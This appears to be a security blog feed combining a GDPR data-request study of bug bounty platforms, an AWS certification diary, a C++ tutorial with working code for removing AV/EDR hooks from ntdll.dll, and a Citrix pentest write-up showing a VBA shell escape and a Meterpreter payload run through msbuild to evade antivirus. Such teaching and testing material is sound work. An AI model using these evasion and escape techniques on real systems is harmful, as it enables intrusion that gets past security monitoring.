If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Zerocopter validated all email addresses that I mentioned in my request by asking personal questions about the accounts in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First and last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact with Zerocopter themselves such as through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter only cited their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, European bug bounty platforms like Intigriti and Zerocopter seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head): typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected, with AWS leading (~34%), Azure having roughly half of AWS’s share (~17%), Google (~6%), and the “others” accounting for the rest. Note: Although Azure owns half of AWS’s market share percentage, their annual growth (62%) is double that of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and the proposed paths to achieve them. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty, but I decided not to do that. Why? I figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty, to appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practitioner. This involves a ton of sophisticated research, better known as Google 🤣, in addition to trolling all related Reddit threads that I can find. This is how I narrow down the best materials to prepare with and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometimes I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From the initial thought, it’s 5 days later. Exam scheduled for 1800 hrs. I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end the exam. In a horrible play, AWS forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works, because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was the most challenging cert of folks’ lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe they impose some of the fear they had onto others who are coming behind them? One thing about me, I get tired of studying for the same thing quickly. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one you go for, it’s pretty much going deeper into the usage and capabilities of the appropriate related services. I chose to sit for C01; although C02 was recently released, I wasn’t going to risk being a live beta tester, as I was concerned with the newer exam’s stability. As I write this, C01 is officially dead in 3 days (July 1, 2020), and then all candidates will only have C02. Good luck 🤣.

Date: Monday 05/14/2020 – 0800 hrs

5 days after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retaken it the next day I would have passed (again, idk why; maybe that’s my way of dealing with failure, going even further balls to the wall 🤣). The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing and no one could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source, so I went to A Cloud Guru’s course, which I felt was really light compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek, the instructor, is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days after the 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know after this go-around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention: when you pass any AWS cert you get 50% off the next, so failing the first one totally screwed up my financial efficiency; I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer to. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty, but he didn’t 😞 so I went through the Linux Academy course. After that, I bought Jon Bonso’s course at Tutorials Dojo.

Listen. LISTEN. 🗣🔊 LISTEN. The length of these questions is in-freaking-sane. I remember one night losing track of time, completing only like 20 questions, but over 2 hours had elapsed. It quickly negged me out. I love reading, but my gosh, these were monsters and the scenarios were ridiculous. I was like, bump this, I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I had forgotten all the things I learned from the course; I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again: nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there, I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8, so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case I failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later that day at about 1400 hrs, I don’t know why, but I went back to the exam scheduling and saw they had an exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled and confirmed it. As soon as I did that I thought, “why the hell did you do that?”

If there was one thing I knew, it was this: I was going to be even more disappointed than I was when I came up short on Solutions Architect the first time. I imagine it would have been something like this after failing.

via GIPHY

The exam was TOUGH. No other way to put it, and guess what? Every single question was a monster, just like the Bonso questions: 2 paragraphs minimum, sometimes like four, a tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time-wise, I breezed through Practitioner in ~35 minutes, Solutions Architect in ~55 minutes, and this thing, #bruh, I remember looking up thinking sheesh, you’re two hours deep. I had finally finished all 65 questions. Enter second-guessing yourself:

I’m not clicking next or ending the exam this time! There were maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen: reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like playing Russian roulette. I changed about 9 answers total, each one filled with the thought, “You’re probably on the borderline right now; you’re going to change an answer that’s correct, make it wrong, and that’s going to be your demise.” It’s worth mentioning that only about 50% of the questions are single choice. The others are select the best 2 or 3 out of 6 or 7 selections. The questions are drawn randomly from a bank like most exams, so I’m not sure if the same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example:

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

The majority of the exam was exactly that: reading and understanding policies. IAM, KMS, bucket policies: you’d better be able to read and understand them as if they were plain English. There was a ton of KMS-related material; make SURE you know the nitty gritty like imported key material and all the different KMS encryption types: when, where, rotation, etc.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19, this will be the first year since I stopped being poor 😂 (after graduating ~5 years ago) that I won’t be on an island celebrating. Such is life. I bought myself AWAE as a birthday gift; I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine whether it is malicious. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper around a system call to kernel mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting at its beginning an unconditional jump into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow jumps back to the original function so that it performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of the hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
// SEC_IMAGE maps the file as an executable image; both size arguments are 0 to map the whole file
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to the module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

HANDLE hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what we are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the module base plus hookedSectionHeader->VirtualAddress, the start of the loaded .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes)

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize);

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

DWORD oldProtection;
bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.
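Before turning to a disassembler, the two dumps can also be compared programmatically. Here is a rough Python sketch of the kind of byte-wise comparison VBinDiff performs (illustrative only; the example byte values are made up, and this is not part of the original C++ tool):

```python
def diff_bytes(hooked: bytes, clean: bytes):
    """Return (offset, hooked_run, clean_run) for each run of differing bytes."""
    diffs = []
    i, n = 0, min(len(hooked), len(clean))
    while i < n:
        if hooked[i] != clean[i]:
            start = i
            while i < n and hooked[i] != clean[i]:
                i += 1
            diffs.append((start, hooked[start:i], clean[start:i]))
        else:
            i += 1
    return diffs

# Synthetic example: a 5-byte jmp plus int3 padding patched over a clean stub
clean = bytes.fromhex("4c8bd1b837000000")   # mov r10,rcx ; mov eax,0x37
hooked = bytes.fromhex("e978b905c0cccccc")  # jmp ... ; int3 padding
for offset, h, c in diff_bytes(hooked, clean):
    print(f"offset {offset:#x}: hooked={h.hex()} clean={c.hex()}")
```

Running this over the real hooked.txt and clean.txt contents would flag exactly the regions highlighted in red below.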

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax instructions with a number mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to an RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel, delivered over the network to our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

Sub X()
    Shell "CMD /K %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create a Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by disabling Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However, I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very difficult to expose VBA and Powershell functionality without also allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into. One is using native Windows system calls (AKA syscalls), the other is using Dynamic Invocation. Each has its pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

